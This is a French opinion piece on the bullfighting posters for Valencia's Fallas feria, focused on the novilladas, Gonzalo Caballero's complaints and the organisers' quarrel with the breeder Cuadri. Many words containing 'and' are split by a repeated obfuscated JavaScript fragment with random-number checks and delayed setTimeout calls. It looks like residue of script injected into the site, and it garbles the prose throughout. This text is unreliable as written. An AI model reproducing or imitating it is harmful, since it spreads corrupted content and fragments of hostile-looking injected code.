CONTRE-JOUR DE LA FERIA DES FALLAS

On connaît les affiches. Pour le toreo à pied, sept corridas de toros, deux novilladas piquées et une autre sans chevaux, composent le cycle. Concernant les matadors de toros, et toujours sous l’angle de ce qui intéresse la Fiesta, c’est un peu comme d’habitude : il y a des noms en trop, d’autres qui manquent, et le gros des affiches est composé de ceux qui méritent amplement d y figurer.

Toujours sous le même critère des exigences tauromachiques, il faut se féliciter que les organisateurs aient programmé deux novilladas piquées, avec à mon avis une bonne vision de l’avenir, car heureusement nous comptons aujourd’hui avec un éventail de novilleros très intéressant et il faut profiter de cette circonstance pour voir si ces garçons d’amener à nouveau le public aux arènes pour ce type de spectacles, source et vivier du toreo de demain.

Je ne mens pas si je vous dis que mon plus grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and intérêt dans ces Fallas se porte précisément sur les novilladas ; avec trois noms qui attirent mon attention : Ginés Marín, Varea et le début mexicain Leo Valadez, qui m’a fait une très belle impression dans la feria de novilladas non piquées de « Soy Novillero ». Il sera intéressant de voir comment il se débrouille dans sa présentation avec picadors ; d’ailleurs j’ai été surpris qu’on l’ait inclus dans ce cycle à la dernière heure car si les cartels ont été rendus publics vendredi, jusqu’à jeudi dans la nuit –comme l’annonçait David Casas dans son émission « El Kirikiki »- c’était Ginés Marín –faisant ainsi le doublon dans cette feria- qui occupait le poste finalement destiné au Mexicain.

Je préfère croire que ce changement si drastique était plutôt lié à une suggestion urgente du groupe de Baillères et non pas aux déclarations de Gonzalo Caballero dans cette émission quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il toucha le point sensible comme l’un des maux dont pâtit la Fiesta, qui n’est autre que l’ « échange de vignettes ». Je ne sais pas non plus si la formule a un sens s’agissant des novilladas de Valence, mais le jeune homme de Torrejón- présenté injustement par David Casas comme le novillero les plus injustement traité- il avait raison de se plaindre en raison du manque d’écho de ses oreilles de Madrid et de sa sortie a hombros de Pampelune, qui lui valut pour ne pas revenir l’année suivant avec le prétexte fallacieux de ne pas répéter les novilleros triomphateurs, ce qui peut être facilement contredit en fouillant dans les hémérothèques. Souhaitons donc que s’impose la raison, qu’on fasse attention aux demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes de ce garçon et qu’on ne s’attaque pas à ceux qui se sentent « offensés ».

Mis à l’écart comme peut se sentir Roca Rey qui l’année dernière coupa trois oreilles dans la matinale non piquée de cette même feria et qui en octobre dernier coupa à nouveau, cette fois en novillada piquée, alors que ceux qui l’accompagnaient à l’affiche, Expósito et Varea, ne remportèrent rien.

Blessé, pour plein de raisons, devrait l’être Fernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando Cuadri par le comportement des organisateurs de Valence, car sans demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ander son avis ils décidèrent de programmer la corrida de l’éleveur de Huelva en juillet au lieu des Fallas. Fernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando, dont la simplicité ne l’empêche pas de défendre ses droits et demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ander le respect qu’il mérite en tant que ganadero, décida par conséquent de prendre la décision la plus digne pour lui : retirer sa corrida de Valence. Ainsi, à cause de l’arbitraire des organisateurs, l’aficion de Valence ne pourra pas voir les toros de Cuadri ni pendant les Fallas ni pendant la feria de juillet. Dommage, après le triomphe de la devise tricolore pendant la dernière feria de San Jaime.

En soupesant les agissements des organisateurs, qui concernant ce dernier cas manquent de toute courtoisie et frôlent le despotisme, on ne peut que donner raison à Gonzalo dans sa dénonciation des marchandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andages qui prolifèrent derrière les rideaux ; des marchandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andages qui ont prouvé que deux oreilles de coupées et un bon lot de toros dont un fit le tour de piste comme « Trastero », servent uniquement pour sortir des Fallas Rafaelillo –celui qui les coupa- ainsi que le fer de Cuadri, victimes les plus notoires de ces intrigues et tractations au service d’ « invisibles » intérêts particuliers.

 

Les commentaires sont fermés.